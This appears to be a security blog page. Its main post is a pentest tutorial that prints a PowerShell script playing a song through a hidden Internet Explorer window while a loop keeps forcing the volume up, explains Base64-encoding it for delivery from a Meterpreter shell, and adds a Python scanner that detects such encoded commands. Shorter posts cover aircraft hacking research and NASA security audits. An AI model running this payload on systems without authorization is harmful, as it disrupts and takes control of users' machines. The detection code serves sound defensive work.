Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit

[Image: Iran Thunderstruck]

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no-no, so don’t do it. Actually using this against any system that you do not have express written permission to test will probably land you in jail, so again, don’t do it. Lastly, this is not new; it is based on a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code that plays AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbell. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check it out:

The code can be found on his GitHub site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly, we will need a willing Windows 7 system as a target. This attack did not seem to work very well against a VMware virtual machine (the volume-up loop bogs a VM down considerably), so I used a stand-alone physical system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = "http://www.youtube.com/watch?v=v2AC41dglnM"
# Create a hidden Internet Explorer COM object and open the video in it
$IEComObject = New-Object -com "InternetExplorer.Application"
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
# The key-press loop below runs for 3 minutes (roughly the length of the song)
$EndTime = (Get-Date).AddMinutes(3)
Write-Verbose "Loop will end at $EndTime"
# Ghetto way to do this, but it basically presses Volume Up in a loop for 3 minutes
do {
    $WscriptObject = New-Object -com wscript.shell
    $WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The $VideoURL string sets the song, which is of course Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False line tells PowerShell to hide the IE window so that it never appears on the user’s screen. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) in which the Volume Up key (character 175) is sent repeatedly via the WScript.Shell SendKeys method. As mentioned earlier, this loop really bogs down the target computer, so you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt”.

3. Base64 encode the script:

[Image: Iran Thunderstruck 2 – Base64 encoding the script]

Now all we need to do is use Metasploit to get a remote shell on the target system and then call the encoded script from that shell using PowerShell, like so:

[Image: Iran Thunderstruck 3 – running the encoded script from the Meterpreter shell]

And that is it: after a short pause the remote target system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn the volume down using the speaker icon, the script fights back by turning it up again until the song is over!

[Image: Iran Thunderstruck 4]

Defending against this attack

The bad thing about PowerShell based attacks is that most antivirus products, and Windows itself, do not see them as malicious. So your best bet is to never, ever open unsolicited attachments that you receive on social media sites or via e-mail. Also, run script-blocking software to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!
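Because the script is delivered as a Base64 blob, a defender who only greps command lines for strings like “InternetExplorer.Application” will miss it; the blob has to be decoded first. As an added, defender-side example (my own code, not from the post and not from obscuresec’s botnet script), the following Python scanner pulls -EncodedCommand style arguments out of process-creation log lines, decodes them the way powershell.exe does (Base64 over UTF-16LE), and reports which indicators of the hidden-IE-plus-SendKeys pattern above the decoded script matches. The log lines, the indicator names and the file paths are all constructed for the example, and the encoder is only there to build the sample log.

```python
import base64
import re
from typing import Dict, Iterator, List, Optional

# Constructed sample for this example: the volume-up snippet from the post,
# exactly the kind of script a -EncodedCommand blob would carry.
SAMPLE_SCRIPT = r'''[string] $VideoURL = "http://www.youtube.com/watch?v=v2AC41dglnM"
$IEComObject = New-Object -com "InternetExplorer.Application"
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).AddMinutes(3)
do {
    $WscriptObject = New-Object -com wscript.shell
    $WscriptObject.SendKeys([char]175)
} until ((Get-Date) -gt $EndTime)'''

# Patterns a defender would key on once the blob is decoded (names are my own).
INDICATORS = {
    "ie_com_object": re.compile(r"InternetExplorer\.Application", re.I),
    "window_hidden": re.compile(r"\.visible\s*=\s*\$False", re.I),
    "wscript_shell": re.compile(r"wscript\.shell", re.I),
    "sendkeys":      re.compile(r"\.SendKeys\s*\(", re.I),
    "volume_up_key": re.compile(r"\[char\]\s*175", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so capture "-e<letters> <base64>" and check the prefix afterwards.
FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects:
    UTF-16LE bytes, then Base64. Used here only to build the sample log."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Reverse of encode_command; returns None for anything that is not a
    valid Base64/UTF-16LE payload (bad characters, odd byte count, ...)."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def extract_encoded(cmdline: str) -> Iterator[str]:
    """Yield every Base64 blob passed through a -EncodedCommand style switch."""
    for m in FLAG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        if "encodedcommand".startswith(flag):   # rejects -ExecutionPolicy etc.
            yield m.group(2)


def scan_logs(lines: List[str]) -> List[Dict]:
    """Decode encoded commands found in process-creation log lines and report
    which indicators each decoded script matches. Lines with no hits are dropped."""
    findings = []
    for line_no, line in enumerate(lines):
        for blob in extract_encoded(line):
            script = decode_command(blob)
            if script is None:
                continue
            hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
            if hits:
                findings.append({"line_no": line_no, "hits": hits, "script": script})
    return findings


# Constructed Sysmon-style process-creation lines (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOGS = [
    f'EventID=1 Image={PS} CommandLine="powershell.exe -nop -w hidden '
    f'-EncodedCommand {encode_command(SAMPLE_SCRIPT)}"',
    f'EventID=1 Image={PS} CommandLine="powershell.exe -ExecutionPolicy Bypass '
    f'-File C:\\scripts\\nightly-backup.ps1"',
    f'EventID=1 Image={PS} CommandLine="powershell.exe -enc '
    f'{encode_command("Get-Process | Sort-Object CPU -Descending")}"',
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line_no']}: indicators {f['hits']}")
```

Only the first sample line is reported; the benign -File invocation carries no encoded blob, and the encoded Get-Process one-liner decodes cleanly but matches none of the indicators. In practice you would feed this the CommandLine field from Sysmon Event ID 1 or Windows Security event 4688 (with command-line auditing enabled), which is where a hidden PowerShell window launched from a Meterpreter session shows up even when antivirus stays silent.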


Hacking Airplanes with SIMON and PlaneSploit

Title Image from Hugo Teso's HiTB Presentation

For those who thought hacking car systems or medical devices was bad, what if airplane systems were exploitable? Could you access a plane’s secured communication system and monitor it or, even worse, take over the plane?

At this year’s Amsterdam Hack in The Box Security Conference, security researcher Hugo Teso demonstrated how this could be done…

From an Android Smartphone…

Teso is not only a security researcher, but also a commercial airline pilot. He created a test lab using airplane communication hardware that he was able to buy online. He then analyzed the system and created his own exploit code called SIMON and a custom smartphone app called PlaneSploit.

According to Forbes, Teso told the crowd that he could send radio signals to planes that would cause them to execute arbitrary commands such as changes in direction, altitude, speed, and the pilots’ displays.

And in a phone interview with Forbes’ Andy Greenberg, Teso said, “You can use this system to modify approximately everything related to the navigation of the plane, that includes a lot of nasty things.”

He was able to acquire all the hardware needed online through sites like eBay. According to his slide presentation, amazingly, some of the parts were as cheap as $9.99:

[Image: ACARS – slide from the presentation]

And he found that many of the communications signals were not encrypted, or used very light security. He was able to do everything from passively eavesdropping on the signals to active attacks such as jamming, replay and complete signal injection.

Teso is working with airline authorities to help rectify the situation. And no, he is not releasing the exploit code, so you won’t see a PlaneSploit module in Backtrack any time soon!

For more information, check out his presentation slides on the HITB website.

NASA Systems still Vulnerable to Attack even after Warnings

Serious security gaps were found in NASA computers during a recent security audit. According to MSNBC:

“Six computer servers associated with IT [information technology] assets that control spacecraft and contain critical data had vulnerabilities that would allow a remote attacker to take control of or render them unavailable,” the audit report released Monday by Inspector General Paul K. Martin said.

“The attacker could use the compromised computers to exploit other weaknesses we identified, a situation that could severely degrade or cripple NASA’s operations,” the report continued. “We also found network servers that revealed encryption keys, encrypted passwords, and user account information to potential attackers.”

Let’s be realistic though: NASA is a very large organization, and by sheer volume alone securing all of its systems would be a very daunting task. But also according to the article, NASA was specifically warned about security lapses, and a plan was recommended for remediation:

“In a May 2010 audit report, we recommended that NASA immediately establish an IT security oversight program for this key network,” Monday’s report reads. “However, even though the agency concurred with the recommendation it remained unimplemented as of February 2011.”

I really find this stunning, as NASA has a very long history of dealing with hackers. The incidents have run the gamut from simple web defacements to more serious penetrations and data theft. A short list of attacks that NASA has faced includes:

  • 2001-2002 – The well known Gary McKinnon penetration. He claimed he was looking for secret information on UFOs.
  • 2003 – The “Trippin Smurfs” – Jet Propulsion Labs defacement.
  • 2009 – Jeremy Parker Penetration – Accessed a NASA pay service for the science community that provided Oceanic Data recorded from satellites (which is now free).
  • 2009 – The “Code.Breaker” SQL Injection attack – NASA’s “Instrument Systems and Technology Divisions” and “Software Engineering Division” were breached via SQL injection attack. 25 Administrator accounts were compromised.

And let’s not forget about when a couple of JPL sites were offering Viagra, and NASA’s Twitter account was offering TVs for sale last year.

Sure, some of these border on the ridiculous, but the fact remains: NASA has faced several serious data attacks over the years.

NASA isn’t all about space exploration either; it does a lot of scientific research and joint military projects. The fact that a government-run entity has been attacked, and then apparently ignored a plan to remedy the situation, speaks volumes about our nation’s ability, or maybe better said desire, to thwart hacking attempts.

Effective Groundwork being created for Army’s Cyber Command

The Army’s new Cyber Command is up and running, but it is still a work in progress. Although it achieved full operational status in October 2010, the new command is still in a growth phase, acquiring new personnel and honing its mission to defend the service’s computer networks. The command is also refining and coordinating its operational role with other Army and Defense Department organizations.

Read the full story at Government Computer News.